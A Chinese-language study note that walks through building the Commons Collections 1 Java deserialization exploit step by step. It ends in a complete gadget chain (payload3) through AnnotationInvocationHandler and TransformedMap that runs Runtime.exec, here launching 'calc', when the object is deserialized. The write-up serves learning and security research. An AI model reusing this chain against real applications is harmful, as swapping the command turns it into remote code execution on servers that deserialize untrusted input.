Java反序列化漏洞：Commons Collections 1 学习笔记

chenqiang

原文链接：Java反序列化漏洞：Commons Collections 1 学习笔记

​
前置知识
分析Transformer接口及其实现类。

ConstantTransformer：构造函数传入一个对象，调用transform()方法时，不管输入是什么，都返回构造函数ConstantTransformer()传入的对象。

1. 
   
2. // ConstantTransformer构造函数及transform()函数
   
3. public ConstantTransformer(Object constantToReturn) {
   
4.     super();
   
5.     iConstant = constantToReturn;
   
6. }
   
7. 
   
8. public Object transform(Object input) {
   
9.     return iConstant;
   
10. }

复制代码

ChainedTransformer：自动对transformers数组中每一个元素transformers调用transform()，前一个的输出作为后一个的输入，链式调用transform()方法。

1. 
   
2. // ChainedTransformer构造函数及transform()函数
   
3. public ChainedTransformer(Transformer[] transformers) {
   
4.     super();
   
5.     iTransformers = transformers;
   
6. }
   
7. 
   
8. public Object transform(Object object) {
   
9.     for (int i = 0; i < iTransformers.length; i++) {
   
10.         object = iTransformers[i].transform(object);
    
11.     }
    
12.     return object;
    
13. }

复制代码

InvokerTransformer：相当于重新实现了反射，构造函数传入方法名、参数类型、参数。transform()传入对象，进行反射调用。

1. 
   
2. // InvokerTransformer构造函数及transform()函数
   
3. public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
   
4.     super();
   
5.     iMethodName = methodName;
   
6.     iParamTypes = paramTypes;
   
7.     iArgs = args;
   
8. }
   
9. 
   
10. // InvokerTransformer的transform()方法
    
11. public Object transform(Object input) {
    
12.     if (input == null) {
    
13.         return null;
    
14.     }
    
15.     try {
    
16.         Class cls = input.getClass();
    
17.         Method method = cls.getMethod(iMethodName, iParamTypes);
    
18.         return method.invoke(input, iArgs);
    
19. 
    
20.     } catch (NoSuchMethodException ex) {
    
21.         throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist");
    
22.     } catch (IllegalAccessException ex) {
    
23.         throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
    
24.     } catch (InvocationTargetException ex) {
    
25.         throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex);
    
26.     }
    
27. }

复制代码

三种方式弹出计算器

1. 
   
2. // 正常弹计算器
   
3. Runtime.getRuntime().exec("calc");
   
4. 
   
5. // 反射调用计算器
   
6. // 获取一个Runtime的对象
   
7. Runtime r = Runtime.getRuntime();
   
8. // 获取Runtime类
   
9. Class c = Runtime.class;
   
10. // 获取Runtime类的exec()方法，（方法名，参数类型）
    
11. Method execMethod = c.getMethod("exec", String.class);
    
12. // 反射调用exec弹计算器，（对象，参数）
    
13. execMethod.invoke(r,"calc");
    
14. 
    
15. 
    
16. /*InvokerTransformer调用计算器
    
17. 相当于重新实现了反射，把上面的反射调用后两行写成一行
    
18. */
    
19. Runtime r = Runtime.getRuntime();
    
20. InvokerTransformer invokerTransformer = new InvokerTransformer("exec",
    
21.         new Class[]{String.class}, new Object[]{"calc"}).transform(r);

复制代码

构造调用链调用链构造原则：找调用关系要找不同名的方法，如果找到同名，再通过find usages得到的还是一样的结果。最终还是得找不同的方法才能跳转。哪里调用了transform()：checkSetValue()-->transform()
发现了InvokerTransformer类中的transform()方法是危险方法，从后往前找，找哪个类的不同方法里面调用了transform()。

找到InvokerTransformer类中的transform()，右键，点 Find Usages，找函数调用关系，最好找不同名的方法，调用了transform()。因为transform()调用transform()不能换到别的方法里，没有意义。

最后的目标是回到readObject()里，比如LazyMap类中的get()方法调用了transform()，再接着去找谁又调用了get()。如果有一个类的readObject()调用了get()，那我们就可能找到了调用链。

最终选择TransformedMap这个类，因为TransformedMap类中有好几处都调用了transform()。

找到TransformedMap类中checkSetValue()中调用了valueTransformer.transform(value);

1. <code>protected Object checkSetValue(Object value) {</code><code>   
   
2.     return valueTransformer.transform(value);
   
3. </code><code>}</code>

复制代码

看一下valueTransformer是什么，在TransformedMap的构造函数中可以对valueTransformer赋值。

构造函数的参数：传入一个Map和两个Transformer。

1. 
   
2. protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) {
   
3.     super(map);
   
4.     this.keyTransformer = keyTransformer;
   
5.     this.valueTransformer = valueTransformer;
   
6. }

复制代码

TransformedMap的构造函数属性是protected，只能在类内调用。
因此找一下哪里调用TransformedMap()构造函数。
找到decorate()调用了 TransformedMap()。
调用decorate()相当于调用了构造函数。

1. 
   
2. public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {
   
3.     return new TransformedMap(map, keyTransformer, valueTransformer);
   
4. }

复制代码

构造checkSetValue()中的valueTransformer，因为要通过InvokerTransformer反射调用计算器，所以要让valueTransformer = invokerTransformer，invokerTransformer为InvokerTransformer类的一个对象。

在构造函数中可以进行valueTransformer的赋值，但是TransformedMap的构造函数不能直接调用（属性为protected），间接通过decorate()来给valueTransformer赋值。

现在valueTransformer = invokerTransformer

1. 
   
2. // 实例化一个InvokerTransformer (invokerTransformer)
   
3. InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
   
4. // 新建一个map ，传入decorate（）中
   
5. HashMap<Object, Object> map = new HashMap<>();
   
6. Map<Object, Object> transforedMap = TransformedMap.decorate(map, null, invokerTransformer);

复制代码

哪里调用了checkSetValue():setValue()-->checkSetValue()
在AbstractInputCheckedMapDecorator类中的setValue()中调用了checkSetValue()。
AbstractInputCheckedMapDecorator类是TransformedMap的父类。
AbstractInputCheckedMapDecorator类的setValue()重写了Map.Entry类中的setValue()。

直接调用setValue()，可以弹出计算器。

1. 
   
2. // 实例化一个InvokerTransformer (invokerTransformer)
   
3. InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
   
4. // 新建一个map ，传入decorate（）中
   
5. HashMap<Object, Object> map = new HashMap<>();
   
6. Map<Object, Object> transforedMap = TransformedMap.decorate(map, null, invokerTransformer);
   
7. for(Map.Entry entry : transforedMap.entrySet()){
   
8.     entry.setValue(r);
   
9. }

复制代码

哪里调用了setValue():readObject()-->setValue()
AnnotationInvocationHandler类中的readObject()方法中调用了setValue()。

AnnotationInvocationHandler类中的readObject()方法：

1. 
   
2. private void readObject(java.io.ObjectInputStream s)
   
3.     throws java.io.IOException, ClassNotFoundException {
   
4.     s.defaultReadObject();
   
5. 
   
6.     // Check to make sure that types have not evolved incompatibly
   
7. 
   
8.     AnnotationType annotationType = null;
   
9.     try {
   
10.         annotationType = AnnotationType.getInstance(type);
    
11.     } catch(IllegalArgumentException e) {
    
12.         // Class is no longer an annotation type; time to punch out
    
13.         throw new java.io.InvalidObjectException("Non-annotation type in annotation serial stream");
    
14.     }
    
15. 
    
16.     Map<String, Class<?>> memberTypes = annotationType.memberTypes();
    
17. 
    
18.     // If there are annotation members without values, that
    
19.     // situation is handled by the invoke method.
    
20.     for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {
    
21.         String name = memberValue.getKey();
    
22.         Class<?> memberType = memberTypes.get(name);
    
23.         if (memberType != null) {  // i.e. member still exists
    
24.             Object value = memberValue.getValue();
    
25.             if (!(memberType.isInstance(value) ||
    
26.                   value instanceof ExceptionProxy)) {
    
27.                 memberValue.setValue(
    
28.                     new AnnotationTypeMismatchExceptionProxy(
    
29.                         value.getClass() + "[" + value + "]").setMember(
    
30.                             annotationType.members().get(name)));
    
31.             }
    
32.         }
    
33.     }
    
34. }
    
35. AnnotationInvocationHandler(Class<? extends Annotation> type, Map<String, Object> memberValues) {
    
36.     Class<?>[] superInterfaces = type.getInterfaces();
    
37.     if (!type.isAnnotation() ||
    
38.         superInterfaces.length != 1 ||
    
39.         superInterfaces[0] != java.lang.annotation.Annotation.class)
    
40.         throw new AnnotationFormatError("Attempt to create proxy for a non-annotation type.");
    
41.     this.type = type;
    
42.     this.memberValues = memberValues;
    
43. }

复制代码

看AnnotationInvocationHandler类的构造函数，发现构造函数的参数中可以传入Map，那这个Map就是我们完全可以控制的，因为在构造函数里面。

所以我们就可以把我们构造好的TransformedMap放进去，需要注意类属性不是public，为default类型，只有在sun.reflect.annotation包底下才能访问到，因此必须通过反射去获取，不能直接获取。

同时构造函数也是default类型，需要用getDeclaredConstructor()来获取构造函数。

1. 
   
2. // 获取类
   
3. Class<?> c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
   
4. // 获取构造函数
   
5. Constructor<?> annotationInvocationHandlerConstructor = c.getDeclaredConstructor(Class.class, Map.class);
   
6. // 爆破
   
7. annotationInvocationHandlerConstructor.setAccessible(true);
   
8. // 获取实例，随便写一个常用的注解（Override）
   
9. Object o = annotationInvocationHandlerConstructor.newInstance(Override.class, transforedMap);
   
10. 
    
11. serialize(o); // 序列化
    
12. deserialize("ser.bin"); // 反序列化

复制代码

payload1

1. 
   
2. // 此处的Runtime 对象 r 是不能序列化的
   
3. Runtime r = Runtime.getRuntime();
   
4. InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
   
5. HashMap<Object, Object> map = new HashMap<>();
   
6. map.put("key","value");
   
7. Map<Object, Object> transforedMap = TransformedMap.decorate(map, null, invokerTransformer);
   
8. /*
   
9. for(Map.Entry entry : transforedMap.entrySet()){
   
10.      entry.setValue(r);
    
11. }
    
12. */
    
13. // 获取类
    
14. Class<?> c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    
15. // 获取构造函数
    
16. Constructor<?> annotationInvocationHandlerConstructor = c.getDeclaredConstructor(Class.class, Map.class);
    
17. // 爆破
    
18. annotationInvocationHandlerConstructor.setAccessible(true);
    
19. // 获取实例
    
20. Object o = annotationInvocationHandlerConstructor.newInstance(Override.class, transforedMap);
    
21. 
    
22. serialize(o); // 序列化
    
23. deserialize("ser.bin"); // 反序列化

复制代码

从已注释的for循环可以看到，我们调用setValue(r)需要传入r
目前payload的几个问题：
问题1、setValue()中我们需要传入Runtime的对象r，而AnnotationInvocationHandler类中的setValue()中的参数还无法控制。问题2、Runtime类没有继承Serializable接口，不能序列化/反序列化。问题2解决：
Runtime类不能序列化，而Class类可以序列化
Runtime r = Runtime.getRuntime();不能序列化
Class c = Runtime.class;可以序列化

正常的反射调用

1. 
   
2. //        正常的反射调用
   
3. //        获取Runtime的class对象
   
4.         Class c = Runtime.class;
   
5. //        获取getRuntime方法  （函数名，参数类型）无参方法，参数类型写null
   
6.         Method getRuntimeMethod = c.getMethod("getRuntime", null);
   
7. //        获取到Runtime的对象r
   
8. //        第一个参数表示在那个对象调用，getRuntime()为static方法，所以为null
   
9. //        第二个参数表示方法的参数，没有参数，所以为null
   
10.         Runtime r = (Runtime) getRuntimeMethod.invoke(null, null);
    
11. //        获取exec方法
    
12.         Method execMethod = c.getMethod("exec", String.class);
    
13. //        调用exec，（对象，参数）
    
14.         execMethod.invoke(r, "calc");

复制代码

改成InvokerTransformer(方法名， 参数类型， 参数)

1. 
   
2. /*       改写成InvokerTransformer(方法名， 参数类型， 参数)，链式调用
   
3. //        相当于
   
4. //        Class c = Runtime.class;
   
5. //        Method getRuntimeMethod = c.getMethod("getRuntime", null);
   
6. 
   
7. 获取getRuntime方法，相当于在Runtime.class上调用getMethod()方法，参数为getRuntime,
   
8. 参数类型为null
   
9. */
   
10.         Method getRuntimeMethod1 = (Method) new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
    
11.                 new Object[]{"getRuntime", null}).transform(Runtime.class);
    
12. //        获取Runtime对象
    
13.         Runtime r1 = (Runtime) new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
    
14.                 new Object[]{null, null}).transform(getRuntimeMethod1);
    
15.         new InvokerTransformer("exec", new Class[]{String.class},
    
16.                 new Object[]{"calc"}).transform(r1);

复制代码

改成ChainedTransformer的形式

1. 
   
2. //改成ChainedTransformer的形式
   
3. // 构造transformers 数组
   
4. Transformer[] transformers = new Transformer[]{
   
5.         new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
   
6.                 new Object[]{"getRuntime", null}),
   
7.         new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
   
8.                 new Object[]{null, null}),
   
9.         new InvokerTransformer("exec", new Class[]{String.class},
   
10.                 new Object[]{"calc"})
    
11. };
    
12. ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    
13. chainedTransformer.transform(Runtime.class); // 调试的时候要注释掉

复制代码

上面的payload中，只有Runtime.class是我们可以控制的。
payload2，解决了问题2，还不能执行成功。

1. // 此处的Runtime 对象 r 是不能序列化的，需要修改
   
2. // Runtime r = Runtime.getRuntime();
   
3. // InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
   
4. Transformer[] transformers = new Transformer[]{
   
5.         new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
   
6.                 new Object[]{"getRuntime", null}),
   
7.         new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
   
8.                 new Object[]{null, null}),
   
9.         new InvokerTransformer("exec", new Class[]{String.class},
   
10.                 new Object[]{"calc"})
    
11. };
    
12. ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    
13. 
    
14. HashMap<Object, Object> map = new HashMap<>();
    
15. map.put("key","value");
    
16. Map<Object, Object> transforedMap = TransformedMap.decorate(map, null, chainedTransformer);
    
17. /*
    
18. for(Map.Entry entry : transforedMap.entrySet()){
    
19.      entry.setValue(r);
    
20. }
    
21. */
    
22. // 获取类
    
23. Class<?> c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    
24. // 获取构造函数
    
25. Constructor<?> annotationInvocationHandlerConstructor = c.getDeclaredConstructor(Class.class, Map.class);
    
26. // 爆破
    
27. annotationInvocationHandlerConstructor.setAccessible(true);
    
28. // 获取实例
    
29. Object o = annotationInvocationHandlerConstructor.newInstance(Override.class, transforedMap);
    
30. 
    
31. serialize(o); // 序列化
    
32. deserialize("ser.bin"); // 反序列化

复制代码

问题3、AnnotationInvocationHandler类中的readObject()中的for循环中有两个if判断需要满足。问题3解决
分析：
1、可能没进入if判断。
2、后面的setValue()括号中的new AnnotationTypeMismatchExceptionProxy()是我们不能控制的。
第一个if:
调试：下断点运行，发现Override.class中是空的，getKey()得到的是null，进不去第一个if判断。

1. 
   
2. public @interface Override {
   
3. }
   
4. for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {
   
5.     String name = memberValue.getKey();
   
6.     // 因为Override里面是空实现，所以memberType为null
   
7.     Class<?> memberType = memberTypes.get(name);
   
8.     if (memberType != null) {  // i.e. member still exists
   
9.         Object value = memberValue.getValue();
   
10.         if (!(memberType.isInstance(value) ||
    
11.               value instanceof ExceptionProxy)) {
    
12.             memberValue.setValue(
    
13.                 new AnnotationTypeMismatchExceptionProxy(
    
14.                     value.getClass() + "[" + value + "]").setMember(
    
15.                         annotationType.members().get(name)));
    
16.         }
    
17.     }
    
18. }

复制代码

把

1. <code class="hljs">Object o = annotationInvocationHandlerConstructor.newInstance(Override.class, transforedMap);</code>

复制代码

改成

1. <code class="hljs">Object o = annotationInvocationHandlerConstructor.newInstance(Target.class, transforedMap);</code>

复制代码

注解Target中是有参数的。

1. 
   
2. public @interface Target {
   
3.     /**
   
4.      * Returns an array of the kinds of elements an annotation type
   
5.      * can be applied to.
   
6.      * @return an array of the kinds of elements an annotation type
   
7.      * can be applied to
   
8.      */
   
9.     ElementType[] value();
   
10. }

复制代码

第二个if（直接可以进入，不需要构造）：
1、memberType能不能强转成value
2、value是不是ExceptionProxy类的实例

1. <code class="hljs">if (!(memberType.isInstance(value) || value instanceof ExceptionProxy))</code>

复制代码

问题1解决：

使用ConstantTransformer()。
ConstantTransformer：不管输入是什么，调用transform()方法时，都返回构造函数输入的值。
payload3：

1. // 此处的Runtime 对象 r 是不能序列化的，需要修改
   
2. // Runtime r = Runtime.getRuntime();
   
3. // InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
   
4. Transformer[] transformers = new Transformer[]{
   
5.         new ConstantTransformer(Runtime.class),
   
6.         new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
   
7.                 new Object[]{"getRuntime", null}),
   
8.         new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
   
9.                 new Object[]{null, null}),
   
10.         new InvokerTransformer("exec", new Class[]{String.class},
    
11.                 new Object[]{"calc"})
    
12. };
    
13. ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    
14. 
    
15. HashMap<Object, Object> map = new HashMap<>();
    
16. // 第一个值要与所选注解中的参数对应，Target中的参数为value，所以第一个参数要改为value
    
17. map.put("value","value");
    
18. Map<Object, Object> transforedMap = TransformedMap.decorate(map, null, chainedTransformer);
    
19. /*
    
20. for(Map.Entry entry : transforedMap.entrySet()){
    
21.      entry.setValue(r);
    
22. }
    
23. */
    
24. // 获取类
    
25. Class<?> c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    
26. // 获取构造函数
    
27. Constructor<?> annotationInvocationHandlerConstructor = c.getDeclaredConstructor(Class.class, Map.class);
    
28. // 爆破
    
29. annotationInvocationHandlerConstructor.setAccessible(true);
    
30. // 获取实例
    
31. Object o = annotationInvocationHandlerConstructor.newInstance(Target.class, transforedMap);
    
32. 
    
33. serialize(o); // 序列化
    
34. deserialize("ser.bin"); // 反序列化

复制代码

正向调用顺序：

​

编辑

参考文献：

Java 反序列化漏洞（二） - Commons Collections（https://su18.org/post/ysoserial-su18-2/）

Java反序列化CommonsCollections篇(一) CC1链手写EXP（https://www.bilibili.com/video/BV1no4y1U7E1/?spm_id_from=333.880.my_history.page.click&vd_source=3b1d14eb2f4ad239e25f14b736dd9ee4）

Java ysoserial学习之CommonsCollections1(二)（https://mp.weixin.qq.com/s?__biz=MzkzODIwMTIwNg==&mid=2247484514&idx=1&sn=2552ec324c1395c9c3c8b9f78cbb4908&chksm=c2829d7bf5f5146d1d2dd0531344262a31b44f27d8c56c7465a9d0555c8773bc096424a0dd53&scene=178&cur_album_id=1898778471904952325#rd）

Commons Collections Java反序列化漏洞深入分析（https://security.tencent.com/index.php/blog/msg/97）

​